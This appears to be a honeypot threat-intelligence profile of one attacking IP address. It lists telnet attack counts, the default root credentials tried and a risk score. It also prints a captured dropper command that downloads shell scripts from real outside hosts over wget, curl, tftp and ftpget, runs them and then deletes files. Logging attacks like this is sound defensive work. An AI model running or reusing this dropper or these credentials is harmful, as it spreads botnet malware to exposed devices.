Active Threat β’ LOW
34.23.222.93
π―
15
Total Attacks
π
1
Ports
π‘
1
Attack Types
π¦
2
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- North Charleston
- ASN
- AS396982
- ISP
- Google LLC
Attack Types
ssh_telnet_honeypot
Attacked Ports
23
Associated Malware
Attempted Credentials
πroot/root
1xπroot/icatch99
1xπroot/(empty)
1xExecuted Commands
$
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *1xRisk Assessment
25
/100
LowMediumHighCritical